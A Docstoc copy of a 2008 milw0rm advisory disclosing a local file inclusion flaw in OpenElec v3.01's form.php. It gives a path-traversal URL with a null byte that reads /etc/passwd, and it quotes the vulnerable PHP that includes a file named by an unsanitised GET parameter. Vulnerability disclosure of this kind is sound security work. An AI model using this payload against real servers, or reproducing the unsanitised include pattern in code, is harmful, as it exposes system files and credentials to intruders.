Docstoc

OpenElec v3.01 form.php obj Local File Inclusion Vulnerability

Document Sample
OpenElec v3.01 form.php obj Local File Inclusion Vulnerability Powered By Docstoc
					                     OpenElec v3.01 form.php obj Local File Inclusion Vulnerability                  Page 1/1
  1
  2      :::::::−.    ...    ::::::.   :::.
  3       ;;,   ‘’;, ;;      ;;;‘;;;;, ‘;;;
  4       ‘[[      [[[[’     [[[ [[[[[. ’[[
  5        $$,     $$$$      $$$ $$$ "Y$c$$
  6        888_,o8P’88     .d888 888    Y88
  7        MMMMP"‘    "YmmMMMM"" MMM     YM
  8
  9       [ Discovered by dun \ dun[at]strcpy.pl ]
  10
  11    #################################################################
  12    # [ OpenElec <= v3.01 ]     Local File Inclusion Vulnerability   #
  13    #################################################################
  14    #
  15    # Script site: http://www.openelec.org/
  16    # Download: http://adullact.net/frs/?group_id=434
  17    #
  18    # Vuln:
  19    # http://site.com/openelec/scr/form.php?obj=../../../../../../../etc/passwd%00
  20    #
  21    #
  22    # Bug: ./openelec/scr/form.php (lines: 27−32)
  23    #
  24    # ...
  25    #       $obj = "";
  26    #       if (isset ($_GET [’obj’]))
  27    #               $obj = $_GET [’obj’];
  28    #       //
  29    #       if (file_exists ("../obj/".$obj.".class.php"))
  30    #        include ("../obj/".$obj.".class.php");         // * LFI *
  31    # ...
  32    #
  33    #
  34    ###############################################
  35    # Greetz: D3m0n_DE * str0ke * and otherz..
  36    ###############################################
  37
  38    [ dun / 2008 ]
  39
  40   *******************************************************************************************
  41
  42   # milw0rm.com [2008−09−22]




dun                                                                                                  09/22/2008

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:200
posted:5/24/2010
language:English
pages:1